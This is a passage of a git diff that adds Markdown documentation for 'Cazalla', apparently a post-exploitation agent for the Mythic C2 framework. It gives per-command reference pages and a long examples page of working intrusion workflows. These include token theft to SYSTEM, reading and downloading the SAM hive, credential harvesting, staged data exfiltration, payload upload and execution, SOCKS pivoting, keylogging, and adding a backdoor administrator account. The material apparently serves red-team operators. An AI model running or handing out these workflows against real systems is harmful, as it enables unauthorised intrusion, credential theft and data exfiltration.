- Connections to this local port are forwarded through the agent to Mythic, which then connects to a remote destination (remote_host:remote_port)
|
||||
- Default local port: 8080
|
||||
- Useful for accessing services on the target network that are not directly reachable from Mythic (e.g., internal services, databases, management interfaces)
|
||||
- WARNING: Reverse port forwarding creates persistent network connections and may be detected by network monitoring, firewall logging, NIDS, and EDR/XDR network monitoring
|
||||
- Avoid using privileged ports (<1024) which require elevated privileges
|
||||
|
||||
## Output
|
||||
|
||||
```
|
||||
[rpfwd] Reverse port forwarding started on port 8080
|
||||
[rpfwd] Forwarding connections to: 192.168.1.100:80
|
||||
```
|
||||
|
||||
## OPSEC Considerations
|
||||
|
||||
- Reverse port forwarding creates persistent network connections
|
||||
- May be detected by network monitoring, firewall logging, NIDS, and EDR/XDR network monitoring
|
||||
- Avoid using privileged ports (<1024) which require elevated privileges
|
||||
- Consider the operational impact before starting
|
||||
|
||||
## Related
|
||||
|
||||
[Reverse Port Forwarding Support](../../../features.md#reverse-port-forwarding-rpfwd-support), [Usage Examples](../../../examples.md#reverse-port-forwarding-example)
|
||||
|
||||
---
|
||||
|
||||
**Command Category:** Network Tunneling
|
||||
**Requires Admin:** No
|
||||
@@ -0,0 +1,53 @@
|
||||
# screenshot - Capture Screenshot
|
||||
|
||||
Capture a screenshot of the primary desktop display and upload it to the Mythic server.
|
||||
|
||||
## Description
|
||||
|
||||
The `screenshot` command captures a screenshot of the primary desktop display and uploads it to the Mythic server. Uses Windows GDI API (BitBlt) to capture the screen content. Requires an active interactive desktop session.
|
||||
|
||||
## Syntax
|
||||
|
||||
```
|
||||
screenshot
|
||||
```
|
||||
|
||||
## Examples
|
||||
|
||||
```
|
||||
screenshot
|
||||
```
|
||||
|
||||
## Features
|
||||
|
||||
- Uses Windows GDI API (BitBlt) to capture the screen content
|
||||
- The screenshot is automatically uploaded as a file to Mythic for viewing
|
||||
- Requires an active interactive desktop session
|
||||
- May be detected by screen capture detection mechanisms, behavioral analysis, and data loss prevention (DLP) systems
|
||||
- Large screenshots may trigger network monitoring alerts
|
||||
|
||||
## Output
|
||||
|
||||
```
|
||||
[screenshot] Capturing screenshot...
|
||||
[screenshot] Screenshot captured: 1920x1080 pixels
|
||||
[screenshot] Uploading to Mythic...
|
||||
[screenshot] Screenshot uploaded successfully
|
||||
```
|
||||
|
||||
## OPSEC Considerations
|
||||
|
||||
- Screen capture is detected by many security tools
|
||||
- May trigger behavioral analysis alerts
|
||||
- Large screenshots generate network traffic
|
||||
- Requires an active interactive desktop session
|
||||
|
||||
## Related
|
||||
|
||||
[Usage Examples](../../../examples.md#screenshot-example)
|
||||
|
||||
---
|
||||
|
||||
**Command Category:** System Operations
|
||||
**Requires Admin:** No
|
||||
**MITRE ATT&CK:** [T1113 - Screen Capture](https://attack.mitre.org/techniques/T1113/)
|
||||
@@ -0,0 +1,60 @@
|
||||
# shell - Execute Shell Command
|
||||
|
||||
Execute arbitrary shell commands on the target system by spawning cmd.exe.
|
||||
|
||||
## Description
|
||||
|
||||
The `shell` command executes arbitrary shell commands on the target system by spawning cmd.exe. The command is executed in a non-interactive shell and the output is captured and returned. HIGH OPSEC RISK: This command spawns cmd.exe which is heavily monitored by EDR/XDR solutions.
|
||||
|
||||
## Syntax
|
||||
|
||||
```
|
||||
shell <command>
|
||||
```
|
||||
|
||||
## Parameters
|
||||
|
||||
- `command` (required): Shell command to execute.
|
||||
|
||||
## Examples
|
||||
|
||||
```
|
||||
shell whoami
|
||||
shell dir C:\Users
|
||||
shell ipconfig /all
|
||||
```
|
||||
|
||||
## Features
|
||||
|
||||
- The command is executed in a non-interactive shell and the output is captured and returned
|
||||
- HIGH OPSEC RISK: This command spawns cmd.exe which is heavily monitored by EDR/XDR solutions
|
||||
- Command execution and command-line arguments are logged by security tools
|
||||
- Consider using built-in Cazalla commands (`ps`, `ls`, `cat`, etc.) instead when possible, as they provide better OPSEC
|
||||
- Always requires approval from another operator before execution
|
||||
|
||||
## Output
|
||||
|
||||
```
|
||||
Microsoft Windows [Version 10.0.19041.1234]
|
||||
(c) 2020 Microsoft Corporation. All rights reserved.
|
||||
|
||||
C:\Users\Administrator>whoami
|
||||
desktop-abc\administrator
|
||||
```
|
||||
|
||||
## OPSEC Considerations
|
||||
|
||||
- **HIGH OPSEC RISK**: Spawns cmd.exe which is heavily monitored
|
||||
- Command execution and arguments are logged by EDR/XDR solutions
|
||||
- Always requires operator approval (OPSEC pre-check blocks execution)
|
||||
- Consider using built-in Cazalla commands instead when possible
|
||||
|
||||
## Related
|
||||
|
||||
[OPSEC Checking](../../../opsec.md)
|
||||
|
||||
---
|
||||
|
||||
**Command Category:** System Operations
|
||||
**Requires Admin:** No
|
||||
**MITRE ATT&CK:** [T1059 - Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059/)
|
||||
@@ -0,0 +1,46 @@
|
||||
# sleep - Adjust Beacon Interval
|
||||
|
||||
Change the agent's sleep interval (check-in frequency) and optional jitter percentage.
|
||||
|
||||
## Description
|
||||
|
||||
The `sleep` command changes the agent's sleep interval (check-in frequency) and optional jitter percentage. The sleep interval determines how long the agent waits between check-ins with the Mythic server. Jitter adds random variation to the sleep interval to avoid predictable timing patterns.
|
||||
|
||||
## Syntax
|
||||
|
||||
```
|
||||
sleep {"seconds":30,"jitter":10}
|
||||
```
|
||||
|
||||
## Parameters
|
||||
|
||||
- `seconds` (required): Sleep interval in seconds
|
||||
- `jitter` (optional): Jitter percentage (0-100)
|
||||
|
||||
## Examples
|
||||
|
||||
```
|
||||
sleep {"seconds":30,"jitter":10}
|
||||
sleep {"seconds":60}
|
||||
sleep {"seconds":10,"jitter":30}
|
||||
```
|
||||
|
||||
## Features
|
||||
|
||||
- The sleep interval determines how long the agent waits between check-ins with the Mythic server
|
||||
- Jitter adds random variation to the sleep interval to avoid predictable timing patterns
|
||||
- Lower sleep values provide more responsive interaction but increase network activity and detection risk
|
||||
- Higher sleep values reduce detection risk but make the agent less responsive
|
||||
- Jitter helps evade behavioral detection based on timing analysis
|
||||
|
||||
## Output
|
||||
|
||||
```
|
||||
[sleep] Sleep interval set to: 30 seconds
|
||||
[sleep] Jitter set to: 10%
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
**Command Category:** Control
|
||||
**Requires Admin:** No
|
||||
@@ -0,0 +1,57 @@
|
||||
# socks - SOCKS5 Proxy
|
||||
|
||||
Start or stop a SOCKS5 proxy server on the Mythic server.
|
||||
|
||||
## Description
|
||||
|
||||
The `socks` command starts or stops a SOCKS5 proxy server on the Mythic server. When started, the SOCKS proxy allows routing network traffic through the agent to access internal network resources. WARNING: SOCKS proxies generate continuous network traffic and may be detected by network monitoring tools.
|
||||
|
||||
## Syntax
|
||||
|
||||
```
|
||||
socks {"action":"start","port":7002}
|
||||
socks {"action":"stop","port":7002}
|
||||
```
|
||||
|
||||
## Parameters
|
||||
|
||||
- `action` (required): Either `"start"` or `"stop"`
|
||||
- `port` (optional): Port number for the SOCKS proxy (default: 7002)
|
||||
|
||||
## Examples
|
||||
|
||||
```
|
||||
socks {"action":"start","port":7002}
|
||||
socks {"action":"stop","port":7002}
|
||||
```
|
||||
|
||||
## Features
|
||||
|
||||
- When started, the SOCKS proxy allows routing network traffic through the agent to access internal network resources
|
||||
- The default port is 7002
|
||||
- The proxy runs on the Mythic server and uses the agent as a tunnel for network connections
|
||||
- WARNING: SOCKS proxies generate continuous network traffic and may be detected by network monitoring tools, firewall logging, EDR/XDR network monitoring, and network flow analysis
|
||||
- Use non-standard ports and be aware of high bandwidth usage
|
||||
|
||||
## Output
|
||||
|
||||
```
|
||||
[socks] SOCKS proxy started on port 7002
|
||||
```
|
||||
|
||||
## OPSEC Considerations
|
||||
|
||||
- SOCKS proxies generate continuous network traffic
|
||||
- May be detected by network monitoring tools, firewall logging, EDR/XDR network monitoring, and network flow analysis
|
||||
- Use non-standard ports
|
||||
- Be aware of high bandwidth usage
|
||||
- Consider the operational impact before starting
|
||||
|
||||
## Related
|
||||
|
||||
[SOCKS Proxy Support](../../../features.md#socks-proxy-support), [Usage Examples](../../../examples.md#socks-proxy-example)
|
||||
|
||||
---
|
||||
|
||||
**Command Category:** Network Tunneling
|
||||
**Requires Admin:** No
|
||||
@@ -0,0 +1,58 @@
|
||||
# steal_token - Steal Process Token
|
||||
|
||||
Steal and impersonate the security token from a target process.
|
||||
|
||||
## Description
|
||||
|
||||
The `steal_token` command steals and impersonates the security token from a target process. Opens the target process, extracts its token, and impersonates it to assume the security context (user, privileges, groups) of that process. CRITICAL OPSEC RISK: Token theft is heavily monitored by EDR/XDR solutions.
|
||||
|
||||
## Syntax
|
||||
|
||||
```
|
||||
steal_token <pid>
|
||||
```
|
||||
|
||||
## Parameters
|
||||
|
||||
- `pid` (required): Process ID of the process to steal the token from.
|
||||
|
||||
## Examples
|
||||
|
||||
```
|
||||
steal_token 1234
|
||||
steal_token 5678
|
||||
```
|
||||
|
||||
## Features
|
||||
|
||||
- Opens the target process, extracts its token, and impersonates it to assume the security context (user, privileges, groups) of that process
|
||||
- Compatible with Mythic Process Browser for interactive token theft
|
||||
- The impersonation context is automatically tracked and displayed in the Mythic UI
|
||||
- CRITICAL OPSEC RISK: Token theft is heavily monitored by EDR/XDR solutions, especially when targeting LSASS or other critical processes
|
||||
- Always requires approval from another operator
|
||||
- Prefer `make_token` for domain credentials when possible
|
||||
|
||||
## Output
|
||||
|
||||
```
|
||||
[steal_token] Token stolen from process: explorer.exe (PID: 1234)
|
||||
[steal_token] Impersonating user: DESKTOP-ABC\User
|
||||
```
|
||||
|
||||
## OPSEC Considerations
|
||||
|
||||
- **CRITICAL OPSEC RISK**: Token theft is heavily monitored
|
||||
- Targeting LSASS or critical processes triggers high-priority alerts
|
||||
- Always requires operator approval (OPSEC pre-check blocks execution)
|
||||
- Process access is logged by EDR/XDR solutions
|
||||
- Consider using `make_token` instead when you have credentials
|
||||
|
||||
## Related
|
||||
|
||||
[OPSEC Checking](../../../opsec.md), [Token Support](../../../features.md#token-support), [Process Browser Integration](../../../features.md#process-browser-integration)
|
||||
|
||||
---
|
||||
|
||||
**Command Category:** Token Operations
|
||||
**Requires Admin:** No
|
||||
**MITRE ATT&CK:** [T1134 - Access Token Manipulation](https://attack.mitre.org/techniques/T1134/)
|
||||
@@ -0,0 +1,61 @@
|
||||
# upload - Upload File to Target
|
||||
|
||||
Upload a file from the Mythic server to the target system.
|
||||
|
||||
## Description
|
||||
|
||||
The `upload` command uploads a file from the Mythic server to the target system. Requires a file_id (obtained from Mythic's file browser) and a destination path where the file will be written.
|
||||
|
||||
## Syntax
|
||||
|
||||
```
|
||||
upload <file_id> <destination_path>
|
||||
```
|
||||
|
||||
## Parameters
|
||||
|
||||
- `file_id` (required): File ID from Mythic's file browser. Obtained by uploading a file to Mythic first.
|
||||
- `destination_path` (required): Destination path where the file will be written. Supports both absolute and relative paths.
|
||||
|
||||
## Examples
|
||||
|
||||
```
|
||||
upload abc123-def456-ghi789 C:\Users\Administrator\Desktop\payload.exe
|
||||
upload xyz789 C:\Windows\Temp\stager.dll
|
||||
upload file123 C:\temp\data.txt
|
||||
```
|
||||
|
||||
## Features
|
||||
|
||||
- Requires a file_id (obtained from Mythic's file browser) and a destination path where the file will be written
|
||||
- Supports both absolute and relative paths (relative paths are resolved using the current working directory)
|
||||
- Creates a 'File Write' artifact for tracking
|
||||
- Uploads to sensitive locations (System32, Windows, Program Files) or with suspicious extensions (.exe, .dll, .ps1, .bat, .vbs) may trigger detection by security tools
|
||||
|
||||
## Output
|
||||
|
||||
```
|
||||
[upload] Starting upload: C:\Users\Administrator\Desktop\payload.exe (2048000 bytes)
|
||||
[upload] Chunk 1/4 written: 512000 bytes
|
||||
[upload] Chunk 2/4 written: 512000 bytes
|
||||
[upload] Chunk 3/4 written: 512000 bytes
|
||||
[upload] Chunk 4/4 written: 512000 bytes
|
||||
[upload] Upload complete: C:\Users\Administrator\Desktop\payload.exe
|
||||
```
|
||||
|
||||
## OPSEC Considerations
|
||||
|
||||
- File writes are logged by EDR/XDR solutions
|
||||
- Uploads to sensitive locations may trigger alerts
|
||||
- Suspicious file extensions (.exe, .dll, .ps1, .bat, .vbs) are monitored
|
||||
- File write artifacts are automatically tracked
|
||||
|
||||
## Related
|
||||
|
||||
[File Uploads Support](../../../features.md#file-uploads-support)
|
||||
|
||||
---
|
||||
|
||||
**Command Category:** File System
|
||||
**Requires Admin:** No
|
||||
**MITRE ATT&CK:** [T1105 - Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105/)
|
||||
@@ -0,0 +1,42 @@
|
||||
# whoami - Display Current Context
|
||||
|
||||
Display the current security context of the agent.
|
||||
|
||||
## Description
|
||||
|
||||
The `whoami` command displays the current security context of the agent. Shows the username and domain of the active security token. If token impersonation is active, displays the impersonated user context.
|
||||
|
||||
## Syntax
|
||||
|
||||
```
|
||||
whoami
|
||||
```
|
||||
|
||||
## Examples
|
||||
|
||||
```
|
||||
whoami
|
||||
```
|
||||
|
||||
## Features
|
||||
|
||||
- Shows the username and domain of the active security token
|
||||
- If token impersonation is active (via `steal_token` or `make_token`), displays the impersonated user context
|
||||
- Otherwise, displays the process token context
|
||||
- Useful for verifying that token operations succeeded and for confirming the current privilege level before executing commands that require specific permissions
|
||||
|
||||
## Output
|
||||
|
||||
```
|
||||
Current user: DOMAIN\User01
|
||||
Domain: DOMAIN
|
||||
```
|
||||
|
||||
## Related
|
||||
|
||||
[Token Support](../../../features.md#token-support), [Context Tracking](../../../features.md#context-tracking)
|
||||
|
||||
---
|
||||
|
||||
**Command Category:** Token Operations
|
||||
**Requires Admin:** No
|
||||
@@ -0,0 +1,670 @@
|
||||
+++
|
||||
title = "Examples"
|
||||
chapter = false
|
||||
weight = 10
|
||||
pre = "5. "
|
||||
+++
|
||||
|
||||
# Cazalla Usage Examples
|
||||
|
||||
This document provides practical examples and use cases for using Cazalla agent in real-world scenarios.
|
||||
|
||||
## 📋 Table of Contents
|
||||
|
||||
- [Basic Operations](#basic-operations)
|
||||
- [File System Operations](#file-system-operations)
|
||||
- [Process Management](#process-management)
|
||||
- [Token Operations](#token-operations)
|
||||
- [Network Tunneling](#network-tunneling)
|
||||
- [Credential Harvesting](#credential-harvesting)
|
||||
- [Common Workflows](#common-workflows)
|
||||
|
||||
---
|
||||
|
||||
## Basic Operations
|
||||
|
||||
### Initial Reconnaissance
|
||||
|
||||
After deploying the agent, start with basic reconnaissance:
|
||||
|
||||
```bash
|
||||
# Check current user context
|
||||
whoami
|
||||
|
||||
# List current directory
|
||||
pwd
|
||||
|
||||
# List files in current directory
|
||||
ls
|
||||
|
||||
# List running processes
|
||||
ps
|
||||
|
||||
# Check current directory contents
|
||||
ls C:\Users
|
||||
```
|
||||
|
||||
### Navigate File System
|
||||
|
||||
```bash
|
||||
# Change to user directory
|
||||
cd C:\Users\Administrator
|
||||
|
||||
# List files
|
||||
ls
|
||||
|
||||
# Check current directory
|
||||
pwd
|
||||
|
||||
# Change to Desktop
|
||||
cd Desktop
|
||||
|
||||
# List Desktop contents
|
||||
ls
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## File System Operations
|
||||
|
||||
### Reading Files
|
||||
|
||||
```bash
|
||||
# Read a text file
|
||||
cat C:\Users\Administrator\Desktop\notes.txt
|
||||
|
||||
# Read configuration file (may detect credentials)
|
||||
cat C:\Windows\System32\config\sam
|
||||
|
||||
# Read hosts file
|
||||
cat C:\Windows\System32\drivers\etc\hosts
|
||||
|
||||
# Read file with relative path (from current directory)
|
||||
cd C:\Users\Administrator\Desktop
|
||||
cat notes.txt
|
||||
```
|
||||
|
||||
### Downloading Files
|
||||
|
||||
```bash
|
||||
# Download a small file
|
||||
download C:\Users\Administrator\Desktop\important.txt
|
||||
|
||||
# Download a large file (chunked automatically)
|
||||
download C:\Windows\System32\config\sam
|
||||
|
||||
# Download with relative path
|
||||
cd C:\Users\Administrator\Desktop
|
||||
download important.txt
|
||||
```
|
||||
|
||||
### Uploading Files
|
||||
|
||||
```bash
|
||||
# Upload a file (requires file_id from Mythic)
|
||||
# 1. Upload file to Mythic UI first
|
||||
# 2. Get file_id from Files page
|
||||
# 3. Execute upload command
|
||||
upload <file_id> C:\Users\Administrator\Desktop\payload.exe
|
||||
|
||||
# Upload to directory (filename auto-appended)
|
||||
upload <file_id> C:\Users\Administrator\Desktop
|
||||
|
||||
# Upload to staging directory
|
||||
mkdir C:\temp\staging
|
||||
upload <file_id> C:\temp\staging
|
||||
```
|
||||
|
||||
### File Management
|
||||
|
||||
```bash
|
||||
# Copy a file
|
||||
cp C:\Users\Administrator\Desktop\file.txt C:\temp\backup.txt
|
||||
|
||||
# Create directory
|
||||
mkdir C:\temp\new_folder
|
||||
|
||||
# Delete file
|
||||
rm C:\temp\old_file.txt
|
||||
|
||||
# Delete directory
|
||||
rm C:\temp\old_folder
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Process Management
|
||||
|
||||
### Process Enumeration
|
||||
|
||||
```bash
|
||||
# List all processes
|
||||
ps
|
||||
|
||||
# View processes in Process Browser UI
|
||||
# Navigate to PROCESSES tab in Mythic UI
|
||||
```
|
||||
|
||||
### Process Termination
|
||||
|
||||
```bash
|
||||
# Kill a process by PID
|
||||
kill 1234
|
||||
|
||||
# Kill from Process Browser UI
|
||||
# Right-click process → Kill Process
|
||||
```
|
||||
|
||||
### Process Investigation
|
||||
|
||||
```bash
|
||||
# List processes to find target
|
||||
ps
|
||||
|
||||
# Identify process by name (look for explorer.exe, chrome.exe, etc.)
|
||||
# Note the PID
|
||||
|
||||
# Kill the process
|
||||
kill <PID>
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Token Operations
|
||||
|
||||
### Token Enumeration
|
||||
|
||||
```bash
|
||||
# List all available tokens
|
||||
list_tokens
|
||||
|
||||
# Look for high-value tokens (SYSTEM, Domain Admins, etc.)
|
||||
# Note the PID of the process
|
||||
```
|
||||
|
||||
### Token Theft
|
||||
|
||||
```bash
|
||||
# Steal token from a process
|
||||
steal_token 1060
|
||||
|
||||
# Verify impersonation
|
||||
whoami
|
||||
# Output: NT AUTHORITY\SYSTEM
|
||||
|
||||
# Execute commands with stolen token
|
||||
# (Commands will run with token's privileges if selected in Mythic UI)
|
||||
```
|
||||
|
||||
### Token Creation
|
||||
|
||||
```bash
|
||||
# Create token with domain credentials
|
||||
make_token DOMAIN username password
|
||||
|
||||
# Create token for local user
|
||||
make_token "" Administrator P@ssw0rd123
|
||||
|
||||
# Verify token creation
|
||||
whoami
|
||||
# Output: DOMAIN\username
|
||||
|
||||
# Use token for tasking
|
||||
# (Select token from dropdown in Mythic UI before issuing commands)
|
||||
```
|
||||
|
||||
### Token Reversion
|
||||
|
||||
```bash
|
||||
# After completing privileged operations
|
||||
rev2self
|
||||
|
||||
# Verify reversion
|
||||
whoami
|
||||
# Output: Original user context
|
||||
```
|
||||
|
||||
### Complete Token Workflow
|
||||
|
||||
```bash
|
||||
# 1. Check current context
|
||||
whoami
|
||||
# Output: DESKTOP-ABC\localuser
|
||||
|
||||
# 2. List available tokens
|
||||
list_tokens
|
||||
# Find SYSTEM token (PID 1060)
|
||||
|
||||
# 3. Steal token
|
||||
steal_token 1060
|
||||
|
||||
# 4. Verify impersonation
|
||||
whoami
|
||||
# Output: NT AUTHORITY\SYSTEM
|
||||
|
||||
# 5. Execute privileged operations
|
||||
# (Commands run with SYSTEM privileges)
|
||||
|
||||
# 6. Revert to original token
|
||||
rev2self
|
||||
|
||||
# 7. Verify reversion
|
||||
whoami
|
||||
# Output: DESKTOP-ABC\localuser
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Network Tunneling
|
||||
|
||||
### SOCKS Proxy Example
|
||||
|
||||
```bash
|
||||
# Start SOCKS proxy
|
||||
socks {"action":"start","port":7002}
|
||||
|
||||
# Configure proxychains on your machine
|
||||
# Edit /etc/proxychains.conf:
|
||||
[ProxyList]
|
||||
socks5 <mythic_server_ip> 7002
|
||||
|
||||
# Use proxychains with tools
|
||||
proxychains curl https://internal-server.local
|
||||
proxychains nmap -sT 192.168.1.0/24
|
||||
proxychains wget https://internal-server.local/file.txt
|
||||
|
||||
# Stop SOCKS proxy
|
||||
socks {"action":"stop","port":7002}
|
||||
```
|
||||
|
||||
### Reverse Port Forwarding Example
|
||||
|
||||
```bash
|
||||
# Start reverse port forward
|
||||
# Agent listens on 8080, forwards to 192.168.1.100:80
|
||||
rpfwd {"action":"start","port":8080,"remote_host":"192.168.1.100","remote_port":80}
|
||||
|
||||
# Connect to agent:8080 (from another machine)
|
||||
curl http://<agent_ip>:8080
|
||||
# Connection is forwarded to 192.168.1.100:80
|
||||
|
||||
# Stop reverse port forward
|
||||
rpfwd {"action":"stop","port":8080}
|
||||
```
|
||||
|
||||
### Database Access via RPFWD
|
||||
|
||||
```bash
|
||||
# Tunnel database connections
|
||||
rpfwd {"action":"start","port":3306,"remote_host":"10.0.0.50","remote_port":3306}
|
||||
|
||||
# Connect to MySQL through agent (from another machine)
|
||||
mysql -h <agent_ip> -P 3306 -u user -p
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Credential Harvesting
|
||||
|
||||
### Automatic Credential Detection
|
||||
|
||||
The `cat` command automatically detects and reports credentials:
|
||||
|
||||
```bash
|
||||
# Read a file that may contain credentials
|
||||
cat C:\Users\Administrator\Desktop\config.txt
|
||||
|
||||
# If credentials are found, they are automatically:
|
||||
# - Detected in file content
|
||||
# - Reported to Mythic's credential store
|
||||
# - Visible in CREDENTIALS tab
|
||||
|
||||
# Example file content that triggers detection:
|
||||
# username:password
|
||||
# domain\username:password
|
||||
# username@domain.com:password
|
||||
# password=secret123
|
||||
# http://user:pass@host.com
|
||||
# aad3b435b51404ee:hash...
|
||||
```
|
||||
|
||||
### Credential Extraction Workflow
|
||||
|
||||
```bash
|
||||
# 1. Find configuration files
|
||||
cd C:\Users\Administrator
|
||||
ls
|
||||
|
||||
# 2. Read configuration files
|
||||
cat .config
|
||||
cat credentials.txt
|
||||
cat config.ini
|
||||
|
||||
# 3. Check Credentials tab in Mythic UI
|
||||
# All discovered credentials appear automatically
|
||||
|
||||
# 4. Use credentials for token creation
|
||||
make_token DOMAIN username password
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Common Workflows
|
||||
|
||||
### Initial System Reconnaissance
|
||||
|
||||
```bash
|
||||
# 1. Check current context
|
||||
whoami
|
||||
pwd
|
||||
|
||||
# 2. List processes
|
||||
ps
|
||||
|
||||
# 3. Navigate user directory
|
||||
cd C:\Users
|
||||
ls
|
||||
|
||||
# 4. Check Desktop for interesting files
|
||||
cd Administrator\Desktop
|
||||
ls
|
||||
|
||||
# 5. Read interesting files
|
||||
cat notes.txt
|
||||
cat config.txt
|
||||
```
|
||||
|
||||
### Privilege Escalation Workflow
|
||||
|
||||
```bash
|
||||
# 1. List available tokens
|
||||
list_tokens
|
||||
|
||||
# 2. Identify high-value token (SYSTEM, Domain Admin, etc.)
|
||||
# Note the PID
|
||||
|
||||
# 3. Steal token
|
||||
steal_token <PID>
|
||||
|
||||
# 4. Verify impersonation
|
||||
whoami
|
||||
|
||||
# 5. Execute privileged operations
|
||||
# (Commands run with stolen token's privileges)
|
||||
|
||||
# 6. Revert to original token
|
||||
rev2self
|
||||
```
|
||||
|
||||
### Data Exfiltration Workflow
|
||||
|
||||
```bash
|
||||
# 1. Navigate to target directory
|
||||
cd C:\Users\Administrator\Documents
|
||||
|
||||
# 2. List files
|
||||
ls
|
||||
|
||||
# 3. Download important files
|
||||
download important_document.pdf
|
||||
download database_backup.sql
|
||||
|
||||
# 4. Create staging directory
|
||||
mkdir C:\temp\exfil
|
||||
|
||||
# 5. Copy files to staging
|
||||
cp important_document.pdf C:\temp\exfil
|
||||
cp database_backup.sql C:\temp\exfil
|
||||
|
||||
# 6. Download from staging
|
||||
cd C:\temp\exfil
|
||||
download important_document.pdf
|
||||
download database_backup.sql
|
||||
|
||||
# 7. Clean up staging
|
||||
cd C:\temp
|
||||
rm exfil
|
||||
```
|
||||
|
||||
### Lateral Movement via SOCKS
|
||||
|
||||
```bash
|
||||
# 1. Start SOCKS proxy
|
||||
socks {"action":"start","port":7002}
|
||||
|
||||
# 2. Configure proxychains on your machine
|
||||
# Edit /etc/proxychains.conf:
|
||||
[ProxyList]
|
||||
socks5 <mythic_server_ip> 7002
|
||||
|
||||
# 3. Use proxychains for lateral movement
|
||||
proxychains smbclient //internal-server.local/share -U user
|
||||
proxychains rdesktop internal-server.local
|
||||
proxychains ssh user@internal-server.local
|
||||
```
|
||||
|
||||
### File Upload and Execution
|
||||
|
||||
```bash
|
||||
# 1. Upload payload to staging directory
|
||||
mkdir C:\temp\staging
|
||||
upload <file_id> C:\temp\staging\payload.exe
|
||||
|
||||
# 2. Verify upload
|
||||
ls C:\temp\staging
|
||||
|
||||
# 3. Execute payload (if needed)
|
||||
shell C:\temp\staging\payload.exe
|
||||
|
||||
# 4. Clean up
|
||||
rm C:\temp\staging\payload.exe
|
||||
```
|
||||
|
||||
### Screenshot Capture
|
||||
|
||||
```bash
|
||||
# Capture screenshot
|
||||
screenshot
|
||||
|
||||
# Screenshot is automatically uploaded to Mythic
|
||||
# View in Files tab or Screenshot UI
|
||||
```
|
||||
|
||||
### Keylogging Session
|
||||
|
||||
```bash
|
||||
# 1. Start keylogger
|
||||
keylog_start
|
||||
# WARNING: This has CRITICAL OPSEC RISK
|
||||
# Always requires lead operator approval
|
||||
|
||||
# 2. Let keylogger run for desired duration
|
||||
# Keystrokes are automatically captured and sent to Mythic
|
||||
|
||||
# 3. View keylogs in Mythic UI
|
||||
# Navigate to KEYLOGS tab
|
||||
|
||||
# 4. Stop keylogger
|
||||
keylog_stop
|
||||
```
|
||||
|
||||
### Complete Post-Exploitation Workflow
|
||||
|
||||
```bash
|
||||
# 1. Initial reconnaissance
|
||||
whoami
|
||||
pwd
|
||||
ps
|
||||
ls
|
||||
|
||||
# 2. Navigate user directory
|
||||
cd C:\Users\Administrator
|
||||
ls Desktop
|
||||
|
||||
# 3. Read interesting files
|
||||
cat Desktop\notes.txt
|
||||
cat Desktop\config.txt
|
||||
|
||||
# 4. Download important files
|
||||
download Desktop\important.pdf
|
||||
|
||||
# 5. Token enumeration
|
||||
list_tokens
|
||||
|
||||
# 6. Steal high-value token
|
||||
steal_token <PID>
|
||||
|
||||
# 7. Verify impersonation
|
||||
whoami
|
||||
|
||||
# 8. Execute privileged operations
|
||||
# (Commands run with stolen token's privileges)
|
||||
|
||||
# 9. Capture screenshot
|
||||
screenshot
|
||||
|
||||
# 10. Revert token
|
||||
rev2self
|
||||
|
||||
# 11. Adjust sleep for stealth
|
||||
sleep {"seconds":60,"jitter":20}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Advanced Examples
|
||||
|
||||
### Multi-Step Privilege Escalation
|
||||
|
||||
```bash
|
||||
# 1. List tokens to find SYSTEM process
|
||||
list_tokens
|
||||
|
||||
# 2. Steal SYSTEM token
|
||||
steal_token <SYSTEM_PID>
|
||||
|
||||
# 3. Verify SYSTEM context
|
||||
whoami
|
||||
# Output: NT AUTHORITY\SYSTEM
|
||||
|
||||
# 4. Access protected files
|
||||
cat C:\Windows\System32\config\sam
|
||||
download C:\Windows\System32\config\sam
|
||||
|
||||
# 5. Create new user with SYSTEM privileges
|
||||
shell net user hacker P@ssw0rd123 /add
|
||||
shell net localgroup administrators hacker /add
|
||||
|
||||
# 6. Revert to original token
|
||||
rev2self
|
||||
```
|
||||
|
||||
### Network Pivoting via SOCKS
|
||||
|
||||
```bash
|
||||
# 1. Start SOCKS proxy
|
||||
socks {"action":"start","port":7002}
|
||||
|
||||
# 2. Configure proxychains
|
||||
# Edit /etc/proxychains.conf:
|
||||
[ProxyList]
|
||||
socks5 <mythic_server_ip> 7002
|
||||
|
||||
# 3. Scan internal network
|
||||
proxychains nmap -sT 192.168.1.0/24
|
||||
|
||||
# 4. Access internal services
|
||||
proxychains curl http://192.168.1.100
|
||||
proxychains smbclient //192.168.1.100/share -U user
|
||||
|
||||
# 5. Stop SOCKS proxy
|
||||
socks {"action":"stop","port":7002}
|
||||
```
|
||||
|
||||
### Credential Extraction and Lateral Movement
|
||||
|
||||
```bash
|
||||
# 1. Read configuration files
|
||||
cat C:\Users\Administrator\Desktop\config.txt
|
||||
# Credentials automatically detected and reported
|
||||
|
||||
# 2. Check Credentials tab in Mythic UI
|
||||
# Find extracted credentials
|
||||
|
||||
# 3. Create token with extracted credentials
|
||||
make_token DOMAIN username password
|
||||
|
||||
# 4. Verify token creation
|
||||
whoami
|
||||
# Output: DOMAIN\username
|
||||
|
||||
# 5. Use token for lateral movement
|
||||
# (Commands run with domain credentials if token selected)
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Tips and Best Practices
|
||||
|
||||
### Use Built-in Commands
|
||||
|
||||
**❌ Avoid:**
|
||||
```bash
|
||||
shell whoami
|
||||
shell tasklist
|
||||
shell dir
|
||||
```
|
||||
|
||||
**✅ Prefer:**
|
||||
```bash
|
||||
whoami
|
||||
ps
|
||||
ls
|
||||
```
|
||||
|
||||
### Use Relative Paths
|
||||
|
||||
```bash
|
||||
# Change to target directory first
|
||||
cd C:\Users\Administrator\Desktop
|
||||
|
||||
# Then use relative paths
|
||||
ls
|
||||
cat notes.txt
|
||||
download important.pdf
|
||||
```
|
||||
|
||||
### Monitor Artifacts
|
||||
|
||||
After executing commands, always check the Artifacts tab in Mythic UI to see what forensic evidence was created.
|
||||
|
||||
### Review OPSEC Warnings
|
||||
|
||||
Always read and understand OPSEC popup messages before approving commands.
|
||||
|
||||
### Use Appropriate Sleep Intervals
|
||||
|
||||
```bash
|
||||
# Initial deployment (stealth)
|
||||
sleep {"seconds":60,"jitter":30}
|
||||
